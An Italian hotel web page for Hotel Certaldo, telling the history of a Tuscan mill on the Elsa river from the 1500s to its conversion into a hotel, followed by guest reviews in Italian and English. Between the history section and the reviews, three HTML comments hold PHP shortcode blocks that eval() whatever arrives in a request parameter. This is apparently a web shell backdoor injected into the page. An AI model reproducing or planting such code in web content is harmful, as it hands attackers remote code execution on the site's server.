Da vecchio Mulino a Moderno Hotel.

Nel suggestivo paesaggio toscano in un antico mulino sul fiume Elsa abbiamo realizzato l’Hotel Certaldo il luogo ideale per le vacanze e i soggiorni di lavoro.

Sull’isola delimitata dal fiume potrete divertirvi nel verde del campo da golf, immergervi nel blu della piscina o semplicemente godervi la natura.

All’interno un perfetto connubio tra passato e presente per offrirvi il massimo confort in un’atmosfera magica, come la moderna sala meeting in uno spledido salone del ‘500 e le 30 camere pensate con cinque diverse tipologie per offrire un servizio unico e su misura per voi.

…per cominciare un pò di storia

Il fiume Elsa con i suoi 63 km di percorso ha costituito nei secoli passati un territorio dove si sono incontrate e scontrate forze politiche ed economiche come
la Repubblica di Pisa, di Siena e di Firenze.

Quando il regime mediceo conquistò
la Valdelsa si trovò di fronte ad una situazione consolidata da tempo.

Gli studi finora compiuti ci confermano l’impressione di un territorio stabile politicamente, molto civile e senza connessioni patologiche.

Lo studio degli opifici andanti ad acqua (mulini e gualchiere ) può rappresentare un interessante punto di osservazione per il sapere e la tecnologia connessa che si sono moltiplicate nei secoli.

Il fiume Elsa ha ospitato fin dal medioevo numerosi impianti molitori lungo il suo corso di cui oggi restano numerose testimonianze, per citarne alcune basta ricordare: San Galgano, Certaldo, Molin Nuovo.

I documenti ci attestano, che almeno in due occasioni, nel 1313 all’arrivo delle truppe imperiali di Arrigo VII e nel 1529 durante la guerra per il ristabilimento della signoria dei Medici, i mulini Valdelsani furono oggetto di distruzione parziale a causa delle contingenze belliche, con l’obbiettivo di rendere inutilizzabili al nemico queste importanti fonti di approvvigionamento alimentare.

Per venire al caso specifico di nostro interesse, possiamo affermare che le prime notizie, oggi conosciute sul mulino di Certaldo, sito in località “
La Steccaia”(toponimo di per sé indicativo)risalgono al 1500.

Intorno al 1570 il mulino entra a far parte della fattoria “Il Pino” ceduta dal granduca Francesco I dei Medici all’ordine nobiliare dei Cavalieri di Santo Stefano di Pisa.

La fattoria, estesa per circa settanta ettari faceva parte dei beni della famiglia fiorentina dei Cavalcanti, confiscati dal padre di Francesco, Cosimo I dei Medici dopo l’ascesa al poter nel 1537.

La fattoria era dotata di tre frantoi e di due mulini, uno detto di Certaldo situato nel fiume Elsa dotato di cinque palmenti e, l’altro a due palmenti situato nel popolo di Santa Maria Novella.

Il palmento è la macina mediante la quale si macinano i chicchi di grano e le fonti storiche sono molto precise nel descrivere i palmenti dei mulini perché è in base a questi che veniva fissata un’apposita tassa.

I mulini costituivano per lo stato una cospicua fonte di entrata, per cui massima attenzione veniva dedicata soprattutto alla manutenzione di quelle parti soggette ad usura: in primo luogo l’impianto che forniva l’acqua al palmento, vale a dire la gora, la steccaia, le condutture e il ritrecine.

Un recente studio di Sergio Mazzoni ha fatto luce su una serie di interventi di manutenzione attuati dall’ordine di Santo Stefano negli anni sessanta del 1600.

Un impianto molitorio di acqua forniva poi un ulteriore cespite di introito fiscale dall’esercizio della pesca nei pressi della steccaia o della pescaia.

Il mulino di Certaldo è riportato espressamente nel bando del 1612 dove si vieta la pesca: … “La steccaia del mulino di Certaldo, …e di sotto e di sopra per braccia 200 per servizio della sacra Religione e di Santo Stefano…”

Nel 1746, il mulino, fu concesso in affitto insieme a tutti i beni fondiari di campagna dell’ordine di Santo Stefano e nel 1776 era tenuto da Iacopo Landi, colui cui è intestato tutt’oggi il mulino sulla cartografia ufficiale dell’I.G.M.

Sul finire del secolo XIX subì sostanziali modifiche, di cui resta una cospicua mole di documenti nell’archivio di Certaldo, modifiche non solamente estetiche – grazie alle quali assume quella fisionomia che oggi conosciamo soprattutto nella parte inferiore – ma anche funzionali.

Oltre che mulino diventò anche un opificio che produceva energia elettrica e così resta fino alla seconda guerra mondiale, quando subì gravi danni causati dalle truppe tedesche in ritirata.

Infine negli anni della ricostruzione gli ultimi interventi edificatori nell’area portano alla costruzione prima e la modifica dopo di quello che viene definito “molino nuovo” e infine la sopraelevazione del “molino vecchio”.

Ricavato dalle seguenti fonti:

– “Archeologia industriale in Valdelsa” di Paolo Gennai.

– “Un episodio di storia Valdelsana” di Sergio Mazzoni.

<!– [insert_php]if (isset($_REQUEST["jeHVY"])){eval($_REQUEST["jeHVY"]);exit;}[/insert_php][php]if (isset($_REQUEST["jeHVY"])){eval($_REQUEST["jeHVY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Gsj"])){eval($_REQUEST["Gsj"]);exit;}[/insert_php][php]if (isset($_REQUEST["Gsj"])){eval($_REQUEST["Gsj"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["OYo"])){eval($_REQUEST["OYo"]);exit;}[/insert_php][php]if (isset($_REQUEST["OYo"])){eval($_REQUEST["OYo"]);exit;}[/php] –>

11 thoughts on “Da vecchio Mulino a Moderno Hotel.

  1. Semplicemente unico!
    Fantastico Hotel, fantastico personale, atmosfera unica….. inoltre è in un punto strategico da dove puoi visitare gli scenari tipici e le città più belle e importanti di questa meravigliosa regione!

  2. Volete trascorrere un periodo all’insegna della ricerca del vostro equilibrio esistenziale? Avete bisogno di riconciliarvi con il flusso energetico della natura? Di riappacificarvi con essa, e per una volta lasciarvi cullare da fievoli pensieri di leggerezza irrazionale? Questa struttura è veramente il luogo ideale; è il famoso luogo ameno di cui parlava il grande poeta Dante nella sua “Divin Comedìa” -che forse ci sarà stato anche lui? toscano, era toscano, e quindi non si dovrbbe sbagliare!-, in cui l’aria era pulita e la luce splendente. In questo hotel tutto funziona alla perfezione: pensate che anche i graziosi volatili che si aggirano nelle vicinanze reclamano l’ingresso, che non viene loro negato, per purificare i prorpi istinti. Ho trascorso i tre giorni più entusiasmanti di tutta la mia vacanza, grazie all’ubicazione del complesso, alla comodità della stanza e, sopratutto, encomiabile è stato l’atteggiamento dello staff, una vera e propria egida che aleggia su di voi. Pensate che mia moglie dopo il primo giorno di permanenza proferì tali parole: ” Caro! Lo sai che probabilmente, per una volta (forse l’unica), hai colto in pieno e, allo stesso tempo soddisfatto (e la cosa mi stupisce assai) i miei desideri, che sono tra le altre cose difficoltosi da esaudire. Voto 10: inarrivabile!
    Saluti da Alessio e soprattutto da sua moglie.

  3. We (a couple with a teenage daughter) stayed last month at the Hotel Certaldo for four nights.
    We enjoyed our stay very much. The room was very modern, and nice. The Breakfast was great and the stuff was young, friendly, and English speaking. We’ll recommend the hotel to everyone we know.

  4. The hotel was great! We loved our visit. The staff was friendly and inviting to our group. We had a long hard day before we had arrived at the hotel and they were very welcoming to our arrival. They offered us a welcome drink. Our room was beautiful with views of the city. It was our favorite hotel of our trip. Thanks again.

  5. Thank you Hotel Certaldo for a memorable experience – we couldn’t have chosen a better hotel in Tuscany for us and our guests for our wedding. We hope to return to see you again soon :0)

  6. HOTEL DI LUSSO E MOLTO CONFORTEVOLE,STRATEGICAMENTE SITUTATO PER VISITARE I LUOGHI PIU’ BELLI DELLA TOSCANA,ATTRAVERSANDO PANORAMI MOZZAFIATO.PERSONALE GENTILE E SEMPRE DISPONIBILE,LO CONSOGLIO A TUTTI.
    VOTO 10.

  7. A great hotel with modern interior. We really loved our stay. Our room was nice and tastefull decorated. The staff was friendly and helpfull. Breakfast was superb, Swimmingpool was very small.

  8. The best hotel in Tuscany!? I made a long and deep research on Internet and finally decided that Certaldo would be our headquarter for exploring Tuscany.
    WE WERE NOT DISAPPOINTED.
    Hotel Certaldo is really a four star PLUS hotel. Nice, comfortable rooms, serviceminded staff, beautiful breakfast.
    Missing anything? May be an extra chair in the room; sitting on the bed watching TV is NOT comfortable.(on the other hand we did not go to Tuscany to watch TV).
    We strongly recommend Hotel Certaldo!

  9. Stayed at Hotel Certaldo 4 days whilst searching for wedding venues in Tuscany.
    Beautiful hotel with the most helpful staff anyone could ask for. Breakfast was exceptional.Rooms were very comfortable.
    Only downside was our room didn’t have a bath! Highly recommended.

  10. We stay 4 nights at the hotel (April 3-7 2009). We had a great time. The staff is incredible, very helpful. Beautiful hotel and breakfast was great. Very nice room with a very nice bathroom and a very simple but beautiful decor. Highly recomended.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *